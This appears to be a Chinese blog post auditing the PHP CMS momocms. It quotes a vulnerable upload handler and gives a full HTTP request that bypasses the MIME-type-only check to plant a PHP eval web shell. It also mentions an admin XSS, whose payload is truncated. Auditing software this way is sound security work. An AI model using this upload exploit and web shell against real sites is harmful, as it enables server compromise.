• 欢迎访问搞代码网站,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站!
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏搞代码吧
> 后端 > php > momocms代码审计

momocms代码审计

php 搞代码 3年前 (2022-01-23) 38次浏览 已收录 0个评论

无聊时看了站长之家上有个程序挺火的,下载下来看了下。

前端的$_GET都是用intval()函数过滤了,没有什么可利用的。

后台有一处xss

admin\create_sub_product.php的第96行

">

二:上传漏洞

在admin/banner_do.php 中

代码如下

require("./database.php");if(empty($_SESSION['momocms_admin'])){	header("Location:./index.php");		exit;}if($_SESSION['momocms_isAdmin']==1){if (($_FILES["banner"]["type"] == "image/gif")|| ($_FILES["banner"]["type"] == "image/jpeg")|| ($_FILES["banner"]["type"] == "image/png")|| ($_FILES["banner"]["type"] == 本文来源gao@!dai!ma.com搞$$代^@码!网!搞gaodaima代码"image/pjpeg"))  {  if ($_FILES["banner"]["error"] > 0){    echo "Return Code: " . $_FILES["banner"]["error"] . "
";    }else{    	if(!is_dir("../resource/slide/images")){    		mkdir("../resource/slide/images");    	}    	 $pos = strrpos($_FILES["banner"]["name"],".");    	 $back = substr($_FILES["banner"]["name"],$pos);    	 $_FILES["banner"]["name"] = time().$back;      move_uploaded_file($_FILES["banner"]["tmp_name"],      "../resource/slide/images/".  $_FILES["banner"]["name"]);      $pic="../resource/slide/images/".  $_FILES["banner"]["name"];      echo '<script>				parent.document.getElementById("successMsg").style.display="block";				setTimeout(function(){				parent.window.location.href="./banner.php";				},1500);				</script>';    }  }}

可以看到上传至判断了上传的类型,而没有判断上传的后缀等等。

所以可以构造Content-type:image/jpeg 即可突破上传

POST /test/momocms/admin/banner_do.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://localhost/test/momocms/admin/banner.phpCookie: PHPSESSID=a920be64bc19dc2b620e7ddab2441811Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------13761195204349Content-Length: 227-----------------------------13761195204349Content-Disposition: form-data; name="banner"; filename="1.php"Content-Type: image/jpeg<?php eval($_POST['w']);?>-----------------------------13761195204349--


然后在后台挂件哪里可以直接修改php源代码

暂时看了这么多。还有其他的以后再看吧。

以上就介绍了momocms代码审计,包括了方面的内容,希望对PHP教程有兴趣的朋友有所帮助。

搞代码网(gaodaima.com)提供的所有资源部分来自互联网,如果有侵犯您的版权或其他权益,请说明详细缘由并提供版权或权益证明然后发送到邮箱[email protected],我们会在看到邮件的第一时间内为您处理,或直接联系QQ:872152909。本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:momocms代码审计

喜欢 (0)
[搞代码]
分享 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址